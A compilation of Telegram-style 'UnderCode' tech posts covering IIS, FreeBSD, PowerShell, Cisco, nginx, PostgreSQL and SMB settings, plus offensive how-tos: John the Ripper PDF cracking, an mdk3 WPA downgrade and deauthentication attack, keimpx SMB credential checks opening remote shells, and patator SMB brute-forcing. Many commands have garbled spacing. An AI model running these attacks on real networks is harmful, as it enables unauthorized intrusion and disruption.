▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A Great Hacker Build His Own Custom Apps So :
> To Build Your Own Termux You need those Official Packages :
t.me/UndercOdetesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) This project contains scripts and patches to build packages for the Termux Android application.

2) The pakages available here are only from main set. We have some additional repositories:

a) https://github.com/termux/game-packages

b) Game packages, e.g. angband or moon-buggy.

https://github.com/termux/science-packages

c) Science-related packages like gap and gnucap.

https://github.com/termux/termux-root-packages

d) Packages which can be used only on rooted devices. Some stuff available here requires custom kernel (like aircrack-ng or lxc).

https://github.com/termux/unstable-packages

e) Staging repository. Packages that are not stable are only available here.Most likely, new packages will also be placed here.

https://github.com/termux/x11-packages

f) Packages that require X11 Windows System.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IIS: web.config substitute page for error (part 2)
Continuing the loop with IIS, the first part with customErrors
t.me/UndercodeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

> The task is changing and becoming more complicated.

> It is necessary to make sure that everyone displays instead of errors stub pages, and developers can see the error logs in xml

> For IIS I chose the Failed the Request Tracing The Rules , in the components of WIndows Server dostavyalem for IIS , if not installed initially with the role of You:

Web Server - Health and diagnostic - Tracing

Now, going to the IIS snap-in - The right site , you will see the Failed Request Tracing Rules

In the Failed Request Tracing Rules in the "Actions" section on the right, select "Edit Site Tracing" and enable tracing

In the Failed Request Tracing Rules in the "Actions" section on the right, select "Add."

1) All content (*)

2) Status codes - for example 401-999

3) For example, we are interested in everything

4) Finish

5) Now in "C: \ inetpub \ logs \ FailedReqLogFiles \" you will see folders with logs

6) Do not forget that I also added stub pages, now in the config you can see it - path = "/ CustomErrors / error.aspx"

In Web.config, the piece looked like this:

<system.webServer>
...
<httpErrors errorMode="Custom" existingResponse="Replace" >
<clear/>
<error statusCode="401" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="403" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="404" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="405" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="406" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="412" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="501" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="502" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
</httpErrors>
<tracing>
<traceFailedRequests>
<add path="*">
<traceAreas>
<add provider="ASP" verbosity="Verbose" />
<add provider="ASPNET" areas="Infrastructure,Module,Page,AppServices" verbosity="Verbose" />
<add provider="ISAPI Extension" verbosity="Verbose" />
<add provider="WWW Server" areas="Authentication,Security,Filter,StaticFile,CGI,Compression,Cache,RequestNotifications,Module,FastCGI" verbosity="Verbose" />
</traceAreas>
<failureDefinitions statusCodes="401-999" />
</add>
</traceFailedRequests>
</tracing>
</system.webServer>

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Add a New Hard Drive to FreeBSD
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Adding a New Hard Drive to FreeBSD


1) We have a hard drive defined as:
/ dev / sdb1

2) Delete existing sdb1 disk
layout : gpart destroy -F sdb1

3) Create a new gpt sdb1 disk
layout : gpart create -s gpt / dev / sdb1

4) Example of creating swap and fs with ufs:
gpart add -t freebsd-swap -s 1048576 / dev / sdb1
gpart add -t freebsd-ufs / dev / sdb1

5) Create ufs fs on the second created partition:
newfs -U / dev / sdb1p2

6) Add lines to mount on / etc / fstab when loading the
OS : / dev / sdb1p1 none swap sw 0 0
/ dev / sdb1p2 / mnt ufs rw 2 2

7) We connect on the fly ufs section:
mount -a

8) We connect swap section on the fly:
swapon / dev / sdb1p1

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PowerShell Small Commands by UndercOde :
twitter.com/UNDERCODETC

1) Powershell is located here:
C: \ Windows \ System32 \ WindowsPowerShell \ v1.0
or
% SystemRoot% \ System32 \ WindowsPowerShell \ v1.0

2) There is also a development tool - ISE (Integrated Script Environment)
powershell_ise.exe

3) Running PowerShell scripts:
By default, running Windows PowerShell scripts is not allowed

4) Restricted level - prohibits script execution
Unrestricted level - all scripts can be run
AllSigned level - all scripts must be digitally signed
RemoteSigned level - scripts from the network must be signed

5) In the registry, by the path: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ PowerShell A
parameter is set, for example - "ExecutionPolicy" = "AllSigned"
Or we control the cmdlets - Get-ExecutionPolicy and Set-ExecutionPolicy
Example: Set-ExecutionPolicy RemoteSigned

6) Acquaintance
We carry out custom projects in Python
We carry out projects in Python to order. The team of specialists.
python.dm consulting.rf

7) Yandex.Direct
The basic construction of a verb-noun language.

🦑Simple examples:

1> Get-Help - display help.

2> Get-Process - list the processes.

3> Get-Command - print commands.

🦑Parameters are passed through a hyphen “-”.

The output of the commands with the verb " Get":

Get-Command –Verb Get

Command output with the noun “ Event”:

Get-Command –Noun event

🦑 Implicit parameter passing to Get- help command ( command help):

Get-Help Get-Event

Get-Help Get-Event –Detailed

Get-Help Get-Event -Full

Get-Help Get-Event -Examples

List of modules in Powershell:

Get-Module –ListAvailable

Print all commands from the NetTCPIP module :

> Get-Command –Module NetTCPIP

Update help (you need an Internet connection and administrator rights):

Update-help

🦑 Environment variables :
Get-Childitem env:
Get-Childitem env:
dir env: | sort name

🦑 Output variable name and values
Get-Item env: windir
Get-Childitem env: UserName

🦑 Output of the value of the variable

> write-host $ env: windir
write-host $ env: UserName
write-host ([System.Environment] :: CurrentDirectory)
write-host ([System.Environment] :: UserName)

#Changing variables (the Set-Item, Remove-Item, and Copy-Item cmdlets are available)
$ env: customvar = "Var1"
$ env: customvar = $ env: customvar + "Var2"
Set-Item -path env: customvar -value ($ env: customvar + 'Var3')

EN J O Y BY U N D E R C O D E

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Creating Accessory Lists for Cisco Routers :
> t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Configure a simple sheet (identification up to 100):
Create sheet 10 and deny any connections with the address 192.168.0.2 in it

R1 (config) # access-list 10 deny 192.168.0.2

2) We connect the sheet with the input interface:

R1 (config) #interface fastEthernet 1/0
R1 (config-if) #ip access-group 10 in
R1 (config-if) #exit

3) Delete a sheet as follows (you cannot change a simple sheet):
Once you enter the interface, enter

R1 (config-if) #no ip access-group in

4) Configure a complex sheet (identification greater than 100):

Create

R2 (config) #ip access-list extended 110

5) We go to the sheet and configure it (disable icmp between hosts):

R2 (config) #ip access-list extended 110
R2 (config-ext-nacl) #deny icmp host 192.168.0.1 host 192.168.0.2
R2 (config-ext-nacl) #exit

6) We will connect with the interface

R2 (config) #interface fastEthernet 1/0
R2 (config-if) #ip access-group 110 in

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hidden redirect, rewrite and reverse proxy server in nginx to a third-party server :
fb.com/UndercodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Redirect, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# return 301 $ scheme: // test-on-mongo: 5001 $ request_uri;
#}

2) Rewrite, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# rewrite ^ (. *) $ $ scheme: // test-on-mongo: 5001 $ 1 permanent;
# return 403;
#}

3) Rewrite, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# location / {
# if ($ http_host ~ "^ test-on-mongo: 3001") {
# rewrite ^ / (. *) http: // test-on-mongo: 5001 redirect;
#}
#}
#}

4) A third-party web server is running on port 3001, it was previously on port 5001

5) From the old link 5001, nginx redirects to port 80, and then to 3001
# Made to bite a port in url
server {
listen 80;
listen [::]: 80;
server_name test-on-mongo;

location / {
proxy_pass http: // test-on-mongo: 3001;
}
}

server {
listen 5001;
listen [::]: 5001;
server_name test-on-mongo;

return 301 $ scheme: // test-on-mongo $ request_uri;
}

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Official Microsoft GitHub Repository containing code samples for SQL Server for any Linux Server/ Windows or Win server
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone -n https://github.com/Microsoft/sql-server-samples

2) cd sql-server-samples

3) git config core.sparsecheckout true

4 )echo samples/features/*| out-file -append -encoding ascii .git/info/sparse-checkout

5) echo samples/demos/*| out-file -append -encoding ascii .git/info/sparse-checkout

6) git checkout

🦑Extra Note Recommended by UndercOde:

> Sparse checkouts enable you to work on a subset of the repository. It’s worth the effort to set up sparse checkouts on large repositories, everything is much faster!

> I struggled with setting it up on windows getting a lot of “error: Sparse checkout leaves no entry on the working directory”. After a bit of research, I found the following steps were minimal and had consistently good results for me – YMMV.

> The most important point is this – DO NOT USE POWERSHELL/CMD FOR THESE STEPS – use a git bash prompt. This is because otherwise the echo command produces a UNICODE file with a BOM marker. The file MUST be an ANSI formatted file with UNIX style line endings for git to parse it correctly. This is the most likely cause of “error: Sparse checkout leaves no entry on the working directory” errors.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Crack Pdf PassWord Guide Tested :
t.me/iOsDeveloppers

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/magnumripper/JohnTheRipper.git

2) cd ./JohnTheRipper/src

3) sudo apt-get update

4) sudo apt-get install libssl-dev

5) ./configure && make

6) cd ..

7) cd ./run

8) ls

🦑 Generate PDF hash file :

type in term:

> pdf2john.pl /root/Desktop/pdf_exampleprotected.pdf > /root/Desktop/pdf.hash

🦑Brute Force with John:


Now :
>john exampleprotected_pdf.hash

> john --wordlist=password.lst exampleprotected_pdf.hash

🦑Tested by UndercOde on:

> Kali

> Parrot

> debian

> Ubanto

E N J O Y

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Powershell: send SMTP email with authorization :
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Now Powershell code , I wanted to check if the services are running, if someone of interest is stopped, then an SMTP notification is sent

🦑 Sender and Recipient Info
$MailFrom = "sender@senderdomain.com"
$MailTo = "recipient@recipientdomain.com"

# Sender Credentials
$Username = "SomeUsername@SomeDomain.com"
$Password = "SomePassword"

# Server Info
$SmtpServer = "smtp.domain.com"
$SmtpPort = "2525"

# Message stuff
$MessageSubject = "Live your best life now"
$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @'
<!DOCTYPE html>
<html>
<head>
</head>
<body>
This is a test message to trigger an ETR.
</body>
</html>
'@

🦑Construct the SMTP client object, credentials, and send
$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = New-Object System.Net.NetworkCredential($Username,$Password)
$Smtp.Send($Message)

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PostgreSQL guide bu utc
The scheme of the PostgreSQL application is as follows:
t.me/UndercOdeTesting

1) The " POSTMASTER " process on the server receives a connection request

2) Upon successful completion of the check, POSTMASTER creates its copy

3) Next, the interaction with the client database is already through a copy

🦑After installation (Configuring a database cluster)


On Windows, the installation package most likely will write everything automatically to start the cluster, depending on the specified directory, but you can configure the cluster using the utilities below initdb and pg_ctl , they will be in the bin directory, for example - D: \ Postgres \ bin


In this case, it is a set of databases that will be managed by a single server instance.

🦑 A single PostgreSQL instance can start and monitor a set of databases that are isolated from each other but served through the same TCP / IP or UNIX socket


You can use the option to create a cluster with:

initdb - creates a new PostgreSQL database cluster

The syntax is initdb [option ...] [–pgdata | -D] directory


🦑 The desired location of the database cluster is indicated by the -D option:

> sudo postgres

> initdb -D / usr / local / pgsql / data


Or so:

$ sudo postgres

$ pg_ctl -D / usr / local / pgsql / data initdb


🦑 After that, you can try to start the server - sudo service postgresql start


Or there are options


Run postmaster in active mode:

$ postmaster - D / usr / local / pgsql / data


Running in the background using pg_ctl:

$ pg_ctl - D / usr / local / pgsql / data - 1 /tmp/postgresql.log start


🦑 Examples of pg_ctl actions :


Server start:

$ pg_ctl start


Server Stop:

$ pg_ctl stop


Server restart:

$ pg_ctl restart


Server Status:

$ pg_ctl status

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Psql utility :
t.me/UndercodeTesting

In the standard delivery with the server with the postgresql-client package for administration, the psql utility is used , I will give several examples of its functionality (examples for Windows and Linux are similar)

1) On Linux - su - postgres, Windows - cmd - psql


psql --help - help


2) Some utility arguments:

psql -l - list the databases

psql -d database - connect to the database with the name " database "

psql -f script .sql - execute the SQL script " script .sql"

psql -d test -H -c "SELECT * FROM students " -o D: \ Postgres \ f .html - output to file


3) Listing configuration files:

psql> SELECT name, setting FROM pg_settings WHERE category = 'File Locations';


4) Listing Active Sessions:

psql> SELECT * FROM pg_stat_activity;


5) Kill Session:

- Learn id session from

6) SELECT datname as database,

pid

7) usename as username,

application_name as application,

client_addr as client_address,

query

8) FROM pg_stat_activity;


- Specify the session id and database

SELECT pg_terminate_backend ( session id )

FROM pg_stat_activity

WHERE datname = 'DB';

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some BlackArch Program examples2019-2020
t.me/undercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) blackarch-code-audit
Packages for auditing existing vulnerability analysis code.

Examples: flawfinder, pscan

2) blackarch-cracker
Packages used to crack cryptographic functions, such as passwords.

Examples: hashcat, john, crunch

3) blackarch-crypto
Packages that work with cryptography, with the exception of hacking.

Examples: ciphertest, xortool, sbd

4) blackarch-cryptography
Security audit tools for cryptographic algorithms and technologies.

Examples: pyssltest, skul

5) blackarch-database
Packages that at some level include exploit databases.

Examples: metacoretex, blindsql

6) blackarch-debugger
Packages that allow the user to see what a particular program "does" in real time.

Examples: radare2, shellnoob

7) blackarch-decompiler
Packages that try to convert compiled programs to source code.

Examples: flasm, jd-gui

8) blackarch-defensive
Packages that are used to protect against malware and attacks from other users.

Examples: arpon, chkrootkit, sniffjoke

9) blackarch-disassembler
Like blackarch-decompiler and probably a lot of programs will fall into both categories, however, these packages produce assembler code in the output, rather than the raw source code.

Examples: inguma, radare2

10) blackarch-dos
Packets that use DoS attacks (Denial of Service).

Examples: 42zip, nkiller2

11) blackarch-drone
Packages that are used to control physically engineered drones.

Examples: meshdeck, skyjack

12) blackarch-exploitation
Packages that take advantage of exploits in other programs or services.

Examples: armitage, metasploit, zarp

& more...
WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI HACKING : WPA downgrade test:
The WPA downgrade test is a test mode indicated by the letter g . This mode has only one option -t <bssid> , after which you need to specify the target network.
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> The essence of this attack is that mdk3 deauthenticates Stations and APs by sending encrypted WPA packets. With this test, you can check whether the system administrator will try to set the network settings to WEP or disable encryption. mdk3 will allow clients to work with WEP without encryption, so this attack is carried out in the hope that the system administrator will just think that "WPA is broken." Therefore, this attack is designed for an advanced user who will think of changing the settings of the router and be able to do it. This attack refers to social engineering, to increase the likelihood of a successful outcome, it can be combined with other social engineering techniques.

1) look at the available networks:

> sudo airodump-ng wlan0

2) Suppose we are interested in a network called dlink, it uses WPA2 encryption and its BSSID 00: 1E: 58: C6: AC: FB, we also note that the AP works on channel 6.

3) We need to transfer our wireless card to the same channel that the AP works:

> sudo iw wlan0 set channel 6

4) We launch an attack that disconnects all clients from this network and prevents them from reconnecting until encryption is changed to WEP or removed at all:

> sudo mdk3 wlan0 g -t 00:1E:58:C6:AC:FB

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is mdk3 and what can do ?

> mdk3 is a multifunctional program whose main goal is to show the weak points of Wi-Fi networks. The mdk3 utility can be used to suppress Wi-Fi, deauthenticate clients, to confuse wireless network monitors or to confuse intruders who want to attack your wireless network, as well as to perform an attack aimed at lowering the encryption algorithm from WPA to a weaker one or refusing to use it encryption. Those. it can be seen that the program is very versatile.
t.me/UndercodeTesting

🦑 Now Using mdk3 :
The program starts as follows:

> mdk3 - h

🦑in usage :

<interface> is the name of your wireless interface,

<test mode> is one of the program’s functions, for example, stress testing, flood, etc. It is indicated by a small letter without a dash.
mdk3 does not know how to transfer cards to monitor mode and does not switch the interface to the desired channel. Because of this, most often there are problems when mdk3 does not work. These are the most common usage errors - before you start an attack, you need to switch to the desired channel yourself.

🦑 Stop NetworkManager so that it does not bother us:

> sudo systemctl stop NetworkManager
Putting the wireless interface in monitor monitor mode

> sudo ip link set wlan0 down<font></font>

>sudo iw wlan0 set monitor control<font></font>

> sudo ip link set wlan0 up

Note that the interface name is still wlan0 , although it is now in monitor mode

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑keimpx 2020 tool :
keimpx is an open source tool for quickly checking credentials over the network via SMB. Credentials can be:
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) The combination of user / password in clear text.

> User / NTLM hash combination.

> NTLM login / user session token combination.

🦑 If after this phase of the attack any valid credentials were found on the network, the program will ask the user to select a host to connect to and which valid credentials to use. They will be used to open the SMB interactive shell where the user can:

1) Launch an interactive command line.

2) Perform actions in remote SMB network folders: display a list of files and folders, upload, download files, create, delete files, etc.
Deploy and collapse your own services, for example, a backdoor listening on a TCP port for incoming connections.

3) Show details about users, domains, and password policies.
Scan the subnet (-t 192.168.0.0/24) by checking the validity of the username (-U Alexey) and password (-P qweqwe123) for all hosts with network folders :

> git clone https://github.com/nccgroup/keimpx

> cd keimpx

> python3 ./keimpx.py -t 192.168.0.0/24 -U Alexey -P qweqwe123
Connect to the remote host (-t 192.168.0.101) using the username (-U U ndercOde) and password (-P qweqwe123) :

> python3 ./keimpx.py -t 192.168.0.101 -U Undercode -P qweqwe123
As a result, the specified credentials will be checked for correctness. If they are correct, you will be prompted to connect and open an interactive shell to interact with the remote system

🦑TESTED

E N J O Y
WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Brute-force SMB public folder user credentials
patator
T.me/iOsDeveloppers

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) The patator program is designed for brute-force credentials and is one of the most flexible to configure.

2) For brute-force online login and user password for accessing the shared folder (and therefore Windows user credentials), run a command of the form:

>clone https://github.com/lanjelot/patator
./patator.py smb_login host = 192.168.0.101 user = FILE0 password = FILE1 0 = / root / logins.txt 1 = / root / passwords.txt -x ignore: fgrep = 'STATUS_LOGON_FAILURE'

🦑In this command:

./patator.py - the name of the executable file, depending on the installation method it may be patator
smb_login - SMB brute force module
host = 192.168.0.101 - IP address of the computer on which the password is selected. You can specify a file with hosts (more precisely, the file placeholder number)
user = FILE0 - username for brute force. Instead of a name, a placeholder with a pointer to file number 0
password = FILE1 - password for brute force. Instead of a single password, a placeholder is written with a pointer to the file number 1
0 = / root / logins.txt - path to file number 0
1 = / root / passwords.txt - path to file number 1
-x ignore: fgrep = 'STATUS_LOGON_FAILURE' - do not display attempts, in response to which the line STATUS_LOGON_FAILURE was received


🦑That is, two pairs of credentials were found as example:

undercodeOverlord: 1234
undercode2: qweqwe123
Obtained computer name and version of Windows:

\ UndercOdeTesting (Windows 10.0 Build 18362)
Another account was found for which the message STATUS_ACCOUNT_RESTRICTION was received:

mial:
The message said that there are account restrictions for the mial user. The reason is that the username and password are correct (empty password), but users without a password are not allowed on this computer.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Smb Protocol windows :
Twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Server Message Block (SMB) is a networking file share protocol included in Windows 10 that provides the ability to read and write files and perform other service requests to network devices.

2) Usually, you'll be using SMB to connect to devices that don't run Windows, such as a router with file sharing capabilities, Network-Attached Storage (NAS), or other computers running Linux.

3) Although there have been three major releases of the protocol, there is a chance that you may still have devices running the original version, such as SMB version 1 (v1) which is old and insecure, and Windows 10 no longer installs it by default starting with the Fall Creators Update and April 2018 Update. As a result, you'll get error messages like "You can't connect to the file share because it's not secure;" "The specified network name is no longer available;" and "Unspecified error 0x80004005" when trying to access your files.

Thats all!
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SMB protocol recommended settings by UndercOde:

> Optional: there are several versions of the SMB protocol and by default the first version is disabled on modern Windows systems.
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Samba uses the first version for some functions, so if you have a mixed Linux network or if you have outdated equipment that only supports SMB 1, then you can enable support for this version of the protocol. To do this, run cmd with administrator privileges. Check:

> dism /online /get-features /format:table | find "SMB1"

2) To enable SMB 1, do:

> dism /online /enable-feature /all /featurename:SMB1Protocol-Server

3) If you want to disable them, then do:

> dism /online /disable-feature /featurename:SMB1Protocol-Server

4) If you prefer a graphical interface, then in the search, type “ Turn Windows features on or off

search ,switych to on then apply

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to set up a network share on Windows (SMB) without a password
T.me/UndercOdeTesting


1) Computers must be on the same LAN


2) if your devices are connected to the same router, then they all will have access to the shared folder.

3) If you do the configuration in virtual machines , then in the " Network " tab , select " Network Bridge " as the " Connection Type ":

4) Static IP
To configure the SMB shared folder, the static IP address of the computer where the folder will be located is optional. The shared network folder (ball) can be accessed by computer name. Nevertheless, if you are more used to using IP, then you need to configure a static IP address for the computer, which will act as a file server.

5) Computers must have the same workgroup
A computer with a shared folder, as well as all other computers that will have access to the shared folder via SMB, must be in the same workgroup.

6) By default, in the Windows operating system, all computers have the same workgroup with the name WORKGROUP .

7) To check the current group on your computer, open the explorer, find the “ This computer ” tab in it , click the “ Computer ” button at the top and click the “ Properties ” button in the menu that opens

8) In the new window that opens, you will see " Computer Name " and " Workgroup ":

9) If you want to change these values, then click " Change Settings ."

Click the “Change” button to assign a new name to the computer

10) Network Folder Settings in Windows
Windows SMB provides not only network folders, but also the sharing of printers and other resources. Therefore, the settings of shared folders (network ball) are called “ shared ”.

On Windows, when connected to a new network, you may receive the request click at yes and done @UnderCodeTesting

11) A universal option, suitable for those with a wired connection or Wi-Fi: right-click on the network connection icon and click " Open network and Internet settings

12) In the window that opens, click on " Sharing Options ":

>If you want to go to these settings through the “ Control Panel ”, the way is: Control Panel \ Network and Internet \ Network and Sharing Center \ Additional sharing options

In the new window, the settings are divided into three sections:

Private
Guest or public
All networks

13) Shared with password protection
The description says: If password protection is enabled for shared access, only users with an account and password on this computer can access shared files, printers connected to this computer, and shared folders. To open access to other users, you need to disable password protection for shared access.
> switch to off


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁